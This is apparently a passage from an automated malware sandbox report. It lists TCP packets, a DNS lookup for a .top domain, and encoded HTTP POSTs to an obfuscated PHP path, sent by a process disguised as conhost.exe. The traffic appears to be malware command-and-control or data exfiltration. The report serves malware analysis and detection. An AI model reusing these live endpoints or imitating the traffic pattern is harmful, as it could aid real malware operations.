                                                          Oct 1, 2024 05:58:50.861133099 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.865602970 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:50.870343924 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.215244055 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.220129013 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.469536066 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.512044907 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.597157001 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.652645111 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.712893963 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.713540077 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.718183994 CEST804980837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.718233109 CEST4980880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.718369007 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:51.718430042 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.720716000 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:51.725532055 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.076356888 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.081231117 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.333116055 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.387034893 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.493371010 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.543327093 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.617491961 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.618453026 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.622653008 CEST804980937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.622715950 CEST4980980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.623256922 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.623336077 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.623450994 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.628238916 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.871922970 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.872523069 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.877321959 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.877394915 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.877473116 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.882222891 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.922497988 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.991818905 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.997033119 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:52.997246981 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:52.997246981 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.002566099 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.074527025 CEST804981037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.074589014 CEST4981080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.230967045 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.235833883 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.235928059 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.355865002 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.360795021 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.483678102 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.527663946 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.628072023 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.638500929 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.668298006 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.683947086 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.756694078 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.808923006 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.884196043 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.884241104 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.884993076 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.889878035 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.889962912 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.889974117 CEST804981237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.890005112 CEST804981137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:53.890037060 CEST4981280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.890048981 CEST4981180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.890151978 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:53.894913912 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.246519089 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.251524925 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.496187925 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.543340921 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.625339031 CEST804981337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.668294907 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.743155003 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.747967958 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:54.748050928 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.748373032 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:54.753142118 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.108308077 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.113337040 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.382473946 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.433928967 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.515005112 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.558912992 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.641257048 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.646342039 CEST804981437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.646486998 CEST4981480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.646868944 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.651716948 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.651788950 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.651913881 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:55.656636000 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:55.996628046 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.001545906 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.258166075 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.308933973 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.385241032 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.433912992 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.507493973 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.508099079 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.512691975 CEST804981537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.512902975 CEST804981637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.512954950 CEST4981580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.512986898 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.513072968 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.517819881 CEST804981637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:56.872045994 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:56.876943111 CEST804981637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:57.147486925 CEST804981637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:57.199575901 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.287834883 CEST804981637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:57.340193033 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.474216938 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.474688053 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.479532957 CEST804981637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:57.479576111 CEST804981737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:57.479620934 CEST4981680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.479680061 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.479830980 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.481070042 CEST4981380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.484688044 CEST804981737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:57.824647903 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:57.830173969 CEST804981737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.085063934 CEST804981737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.137048006 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.213253975 CEST804981737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.262072086 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.339292049 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.339768887 CEST4981880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.344990015 CEST804981737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.345004082 CEST804981837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.345071077 CEST4981780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.345110893 CEST4981880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.345223904 CEST4981880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.350013971 CEST804981837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.653774023 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.653850079 CEST4981880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.658705950 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.662756920 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.666356087 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.671166897 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.702343941 CEST804981837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.788009882 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.789495945 CEST804981837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.789554119 CEST4981880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.792962074 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:58.793113947 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.793203115 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:58.798006058 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.012113094 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.017016888 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.017033100 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.137186050 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.142086983 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.297585964 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.340253115 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.435758114 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.448971033 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.480818987 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.496597052 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.577435017 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.621542931 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.694988012 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.694988012 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.695720911 CEST4982180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.809401035 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.809448957 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.809564114 CEST804982137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.809623003 CEST4982180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.810194969 CEST804982037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.810235977 CEST804981937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:58:59.810245037 CEST4982080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.810290098 CEST4981980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.811001062 CEST4982180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:58:59.815725088 CEST804982137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:59:00.169488907 CEST4982180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:59:00.174390078 CEST804982137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:59:00.448160887 CEST804982137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:59:00.496416092 CEST4982180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:59:00.586829901 CEST804982137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:59:00.637041092 CEST4982180192.168.2.637.44.238.250

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 1, 2024 05:57:30.739207983 CEST6381953192.168.2.61.1.1.1
                                                          Oct 1, 2024 05:57:31.169207096 CEST53638191.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 1, 2024 05:57:30.739207983 CEST192.168.2.61.1.1.10xbd19Standard query (0)664930cm.n9shka.topA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 1, 2024 05:57:31.169207096 CEST1.1.1.1192.168.2.60xbd19No error (0)664930cm.n9shka.top37.44.238.250A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 664930cm.n9shka.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64970637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:57:31.179536104 CEST370OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:57:31.528407097 CEST344OUTData Raw: 05 02 01 00 06 0a 04 02 05 06 02 01 02 00 01 06 00 0a 05 0b 02 06 03 08 01 02 0c 03 03 06 00 04 0f 06 06 0d 02 04 03 02 0c 56 06 04 05 03 07 55 03 00 0d 08 0c 02 05 07 04 01 03 00 07 02 07 0c 03 02 0c 09 04 02 01 00 0c 03 0d 05 0a 04 0e 01 02 01
                                                          Data Ascii: VUSZRVU\L~k`jtr_aekP|UaO`B{^|po^{lcElY~|mhCwdk^}_~V@{m\L}\q
                                                          Oct 1, 2024 05:57:31.810553074 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:31.905071974 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:31 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 1344
                                                          Connection: keep-alive
                                                          Data Raw: 56 4a 7e 4e 6f 54 7f 06 78 72 56 48 7c 61 6b 49 7c 77 7f 0b 7f 70 58 53 6e 5d 78 4f 69 62 73 5d 74 73 5b 0d 6e 5f 65 49 62 76 68 45 7d 4b 78 01 55 4b 71 0d 74 5b 7c 58 68 72 7a 5c 6b 67 54 41 7b 76 68 0d 7d 5a 77 49 76 71 7d 4c 63 71 5b 04 7c 62 6a 49 7f 6f 7c 40 7d 77 7b 03 76 5c 7b 06 7c 5b 7d 02 6a 5e 5c 5e 79 64 7c 06 6c 67 52 06 6c 6d 6b 4b 6e 4c 63 5b 7a 60 71 5e 68 60 73 5b 79 64 7b 58 6a 5b 7c 5e 76 61 6f 5b 7a 51 41 5b 7d 67 63 52 7f 72 72 50 76 7f 74 03 6f 52 64 01 63 70 53 53 79 5f 65 00 7d 55 79 5c 7b 4f 66 04 76 05 6c 5b 75 71 70 4f 77 71 72 50 7e 5d 7a 06 77 04 7d 04 76 65 5e 09 68 6c 66 5e 60 6f 6c 04 7c 73 6f 5b 6f 6c 51 03 7a 60 66 00 7c 6d 60 08 74 77 6c 02 7e 62 54 09 69 6d 63 42 6c 6d 5b 5a 7d 04 6a 5e 7b 5d 46 51 7c 6f 68 08 6a 70 63 55 69 5e 7e 05 6c 43 63 4b 6c 5c 70 01 7c 5f 59 44 7d 77 5d 40 7e 73 7a 51 7a 70 6c 06 7f 61 60 00 77 5d 57 51 7b 5c 79 07 75 66 64 07 7d 66 52 06 7e 76 53 41 74 4c 59 01 7c 5c 61 07 7c 49 72 09 78 58 70 09 7d 63 59 00 76 72 53 03 74 4f 79 02 7f 4f [TRUNCATED]
                                                          Data Ascii: VJ~NoTxrVH|akI|wpXSn]xOibs]ts[n_eIbvhE}KxUKqt[|Xhrz\kgTA{vh}ZwIvq}Lcq[|bjIo|@}w{v\{|[}j^\^yd|lgRlmkKnLc[z`q^h`s[yd{Xj[|^vao[zQA[}gcRrrPvtoRdcpSSy_e}Uy\{Ofvl[uqpOwqrP~]zw}ve^hlf^`ol|so[olQz`f|m`twl~bTimcBlm[Z}j^{]FQ|ohjpcUi^~lCcKl\p|_YD}w]@~szQzpla`w]WQ{\yufd}fR~vSAtLY|\a|IrxXp}cYvrStOyOX~Bt~g{uOcI{baJ|pqxItL{I`{Ssy\RHx]~^pK{wlD~b{vq`G~|{|YVBqmAwl^N{|ptNnCy_uI~l~LzqTFu]UvORvaf~`~NtLSvuZ~latRl]xylUzpz|SxCtIZrP~moOxmT~r[`V||x}^x}wnLz}wxbZF|q}wc@Ne@ys|M~\xItMyByOqwfZ|vdM~H_AwLgJ|r[gr{HhA}Msub_Nva[IaTK~|t~wwvaQGxrSH}^}{Y^yg|{mwy\VFzcTL{]NZxI`IiboaboX}B{|dhh_\PaRw[{ottNfzOSJjf_z\yvxBagx[L~Jx^TtrT_aK]Q|uvl`B|]lxBQzcjKkn`c^tOiLzBzSYQVTaNTafMV|sPkMUTqINWeXoTtT~cBS|[Q{dTSlrNWZLUe|BpZbRmaWvf^jdvrU`\c|bv_YuP{oP~``Xb[}p_HxXW]RwJTdVCZYIon~ilvYV]ypxPIz\xDxMz_~ws]ldDQ~`YYbVjZW`x{^U\A{lW{CpqyIP}_Y{yXobFZ`]YbPZXaWPcBp\W\l\ox~\CZUJ\}ts]loEW|e]Sn_Z^oXQaMbSoj~y_yD [TRUNCATED]
                                                          Oct 1, 2024 05:57:31.905095100 CEST265INData Raw: 4a 57 63 7e 43 68 74 66 50 79 5b 73 6e 66 4e 7b 43 71 5b 5c 5a 5b 06 7a 43 55 62 57 41 52 54 0c 53 52 00 64 46 5c 7d 78 05 61 5b 7e 44 69 67 71 05 7f 5f 6f 41 57 6b 6b 59 6c 7a 70 65 53 71 73 01 6f 6f 7a 51 50 06 60 54 67 64 04 5f 50 5b 5a 5d 61
                                                          Data Ascii: JWc~ChtfPy[snfN{Cq[\Z[zCUbWARTSRdF\}xa[~Digq_oAWkkYlzpeSqsoozQP`Tgd_P[Z]af|CzUR^PsKVbPIZT\WXcUV[ftQaZ|_\Xq^AZbc@ZrOk_BavCZ_kHSUf@]}]S`lZyQ[ywy]hnN[{oXQa^Q~pTaejqe^}]xQ~{sWjcOQ{aZTnUTqDk^WddTx^_Q}^N\jcGZpHn\F`
                                                          Oct 1, 2024 05:57:31.936719894 CEST346OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 384
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:32.115212917 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:32.115420103 CEST384OUTData Raw: 58 55 5a 58 5c 42 54 54 5c 58 57 5a 54 5f 55 50 59 56 59 5d 50 51 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XUZX\BTT\XWZT_UPYVY]PQVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".";)50=.^%'^;0'V3X+&"11)(/*)!F/'P,9
                                                          Oct 1, 2024 05:57:32.377159119 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 1a 33 0a 2d 0a 35 2c 26 00 3d 2f 30 00 30 09 2f 19 2d 3e 28 41 26 2c 2b 14 2d 32 31 03 3d 3a 31 02 25 2e 33 11 31 32 36 52 30 36 20 5f 0d 10 21 05 23 28 26 50 38 29 2b 15 2b 32 2f 18 26 1e 23 5d 30 33 36 50 2b 00 23 0b 26 3f 25 1c 33 2f 2d 0f 2e 35 01 01 3d 51 2f 0f 23 3b 2d 56 02 1e 22 56 25 2b 31 1d 37 01 13 58 27 01 28 5f 22 06 0f 56 2a 3e 02 12 25 27 32 5b 2a 3d 06 00 2b 3c 37 1d 36 03 39 19 21 21 0b 19 30 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %3-5,&=/00/->(A&,+-21=:1%.3126R06 _!#(&P8)++2/&#]036P+#&?%3/-.5=Q/#;-V"V%+17X'(_"V*>%'2[*=+<769!!03'\ -Q4ZP
                                                          Oct 1, 2024 05:57:32.536948919 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:32.715603113 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:32.748742104 CEST1840OUTData Raw: 58 50 5a 58 5c 46 54 56 5c 58 57 5a 54 52 55 5e 59 55 59 5d 50 5c 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XPZX\FTV\XWZTRU^YUY]P\VD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-!;_)T9_$-.[&^+/3$.#&1=%4"^?8(9!F/'P,
                                                          Oct 1, 2024 05:57:33.282223940 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:57:33 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 58 33 42 3d 0e 22 12 07 59 29 3f 23 10 30 37 2b 17 2d 2d 30 42 31 11 23 5c 39 0c 08 11 3c 3a 36 5c 26 3d 27 10 26 21 2e 1e 24 1c 20 5f 0d 10 22 13 21 06 04 55 2f 5f 34 06 29 08 30 45 31 30 06 02 27 0d 25 0a 28 00 27 0c 26 3c 21 57 24 3c 25 0a 38 1c 27 02 3e 0e 3c 53 34 01 2d 56 02 1e 22 57 31 38 0c 0e 37 3f 3d 5d 24 16 23 07 35 06 3d 1e 3d 2e 20 10 27 24 08 16 2a 03 28 05 28 2c 0d 10 36 04 31 17 34 21 22 0e 24 33 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %X3B="Y)?#07+--0B1#\9<:6\&='&!.$ _"!U/_4)0E10'%('&<!W$<%8'><S4-V"W187?=]$#5==. '$*((,614!"$3'\ -Q4ZP
                                                          Oct 1, 2024 05:57:33.342406034 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:57:33.521408081 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:57:33.521747112 CEST1120OUTData Raw: 58 53 5a 5c 59 48 54 50 5c 58 57 5a 54 5d 55 51 59 51 59 57 50 5a 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
